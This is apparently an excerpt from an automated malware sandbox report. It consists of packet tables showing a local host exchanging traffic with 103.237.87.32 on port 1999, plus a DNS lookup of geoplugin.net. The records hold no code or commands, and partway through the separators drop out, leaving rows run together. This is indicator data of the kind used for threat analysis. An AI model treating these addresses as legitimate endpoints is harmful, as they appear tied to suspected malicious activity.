                Jul 5, 2024 07:13:48.239584923 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.239600897 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.239613056 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.239625931 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.239636898 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.239640951 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.239653111 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.239664078 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.239665985 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.239698887 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.239933968 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.239984035 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.240058899 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240071058 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240082026 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240092993 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240104914 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240115881 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240124941 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.240140915 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.240159988 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.240338087 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240348101 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240500927 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240520000 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240530968 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240541935 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240541935 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.240554094 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240562916 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.240567923 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240573883 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.240581036 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240592957 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240605116 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.240617037 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.240641117 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.241101027 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241112947 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241123915 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241134882 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241147041 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241148949 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.241173983 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.241192102 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.241349936 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241492987 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241504908 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241516113 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241528988 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241544008 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241554976 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.241556883 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241569996 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241580963 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241592884 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:48.241594076 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:48.241612911 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.241630077 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.242063046 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242137909 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242146969 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242176056 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.242252111 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242264032 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242275000 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242285013 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242295980 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242297888 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.242321968 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.242342949 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.242495060 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242506027 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242513895 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242538929 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.242635965 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242647886 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242681026 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.242681980 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242700100 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242712021 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242722988 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242754936 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.243036985 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.243047953 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.243057966 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.243069887 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.243084908 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.243107080 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.243151903 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.243282080 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.244296074 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.244349957 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.244457006 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.244460106 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.244543076 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.244554996 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.244565010 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.244601011 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.290844917 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.290935040 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.291182041 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.491245985 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491265059 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491276979 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491317034 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.491341114 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491358995 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491435051 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.491513968 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491525888 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491537094 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491548061 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491560936 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491585970 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.491606951 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.491791964 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491803885 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491816044 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491828918 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491837978 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.491842031 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491854906 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491873980 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.491897106 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492079973 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492093086 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492126942 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492371082 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492382050 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492392063 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492415905 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492517948 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492530107 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492539883 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492552042 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492563963 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492568970 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492592096 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492611885 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492804050 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492815971 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492827892 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492841959 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492856026 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492882013 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492950916 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492964983 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492974997 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492985964 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493010998 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493026972 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493088961 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493100882 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493505955 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493518114 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493530989 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493541002 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493546009 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493554115 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493566036 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493571043 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493581057 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493581057 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493594885 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493607044 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493607998 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493618965 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493628025 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493639946 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493650913 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493663073 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493699074 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493829012 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494376898 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494389057 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494400024 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494410992 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494421959 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494430065 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494435072 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494446993 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494453907 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494460106 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494466066 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494472027 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494482040 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494493961 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494493961 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494517088 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494522095 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494535923 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494535923 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494549036 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494560957 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494571924 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494573116 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494585991 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494596958 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494599104 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494609118 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494621038 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494626999 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494632006 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494641066 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494651079 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494661093 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494672060 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494672060 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494684935 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494698048 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494702101 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494715929 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494729996 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494736910 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494741917 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494754076 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494757891 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494770050 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494779110 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494788885 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494798899 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494810104 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494820118 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494822025 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494834900 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494841099 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494863987 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494909048 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.495044947 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.495078087 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.495249033 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.495261908 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.495309114 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.496887922 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.496901035 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.496912003 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.496927977 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.496951103 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497031927 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497045040 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497056007 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497067928 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497083902 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497097015 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497123957 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497178078 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497189999 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497201920 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497234106 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497605085 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497616053 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497626066 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497637033 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497667074 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497756004 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497767925 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497781038 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497792959 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497802019 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497803926 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497817993 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497828960 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497829914 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497840881 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497865915 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.498179913 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498192072 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498205900 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498226881 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.498333931 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498347044 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498357058 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498370886 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498384953 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498398066 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498399973 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.498431921 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.521424055 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.585200071 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585360050 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585372925 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585382938 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585393906 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585406065 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585417986 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585431099 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.585472107 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.585514069 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585676908 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585695028 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585707903 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585737944 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.585752964 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:51.304378986 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:51.309530020 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309545040 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309595108 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:51.309617043 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:51.309637070 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309648991 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309690952 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309711933 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:51.309736967 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309830904 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309866905 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309878111 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309921026 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.314466000 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.314596891 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.314646006 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.314730883 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.314740896 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.314753056 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.314836025 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.427540064 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:51.433191061 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.433247089 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:55.070715904 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:55.072191000 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:55.078059912 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:56.250174046 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:14:25.069113970 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:14:25.070664883 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:14:25.075665951 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:14:55.085454941 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:14:55.092830896 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:14:55.099150896 CEST199964545103.237.87.32192.168.2.5
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Jul 5, 2024 07:13:19.536557913 CEST | 53 | 65498 | 1.1.1.1 | 192.168.2.5
                Jul 5, 2024 07:13:44.502325058 CEST | 57274 | 53 | 192.168.2.5 | 1.1.1.1
                Jul 5, 2024 07:13:44.510143995 CEST | 53 | 57274 | 1.1.1.1 | 192.168.2.5
                Jul 5, 2024 07:13:45.104559898 CEST | 53 | 51282 | 162.159.36.2 | 192.168.2.5
                Jul 5, 2024 07:13:45.611350060 CEST | 53 | 63811 | 1.1.1.1 | 192.168.2.5
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Jul 5, 2024 07:13:44.502325058 CEST | 192.168.2.5 | 1.1.1.1 | 0xc6d8 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name/CName | Address | Type | Class | DNS over HTTPS
